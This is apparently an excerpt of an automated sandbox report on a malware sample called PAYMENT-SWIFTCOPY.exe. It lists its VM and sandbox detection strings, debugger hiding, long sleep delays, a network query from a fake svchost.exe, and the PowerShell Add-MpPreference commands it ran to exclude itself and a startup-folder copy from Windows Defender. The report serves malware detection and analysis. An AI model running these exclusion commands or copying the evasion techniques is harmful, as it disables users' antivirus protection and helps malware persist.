              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM3Show sources
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.8120000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9191098.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9011058.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9091078.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.7107d8c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.7107f98.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.7107d8c.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9091078.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.7107c80.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9191098.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.8fd1038.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.7107f98.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.8120000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.402923384.0000000007021000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.561998733.0000000007D80000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.570751004.000000000B1C1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.405143102.0000000008120000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.406478127.0000000008FB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.560276793.0000000006E1E000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
              Source: C:\Windows\System32\svchost.exe TID: 5972Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6420Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 3202 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep count: 2022 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep count: 123 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep count: 2229 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7000Thread sleep time: -13835058055282155s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep count: 3080 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep count: 163 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep count: 1349 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 2778 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep count: 372 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep count: 2004 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -13835058055282155s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3807Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 640Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3202
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2022
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2229
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3080
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1349
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2778
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 372
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2004
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\,
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
              Source: svchost.exe, 00000001.00000002.581741535.000001FBAF462000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
              Source: svchost.exe, 00000001.00000002.581666895.000001FBAF44C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000005.00000002.574608727.0000026D2E802000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
              Source: svchost.exe, 00000001.00000002.575529448.000001FBA9C24000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW=F
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: svchost.exe, 00000005.00000002.575159730.0000026D2E83C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.575218496.0000020092C29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging:

              barindex
              Hides threads from debuggersShow sources
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040289F
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 2996Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\Cursors\???????????????\svchost.exeDomain query: cdn.discordapp.com
              Adds a directory exclusion to Windows DefenderShow sources
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
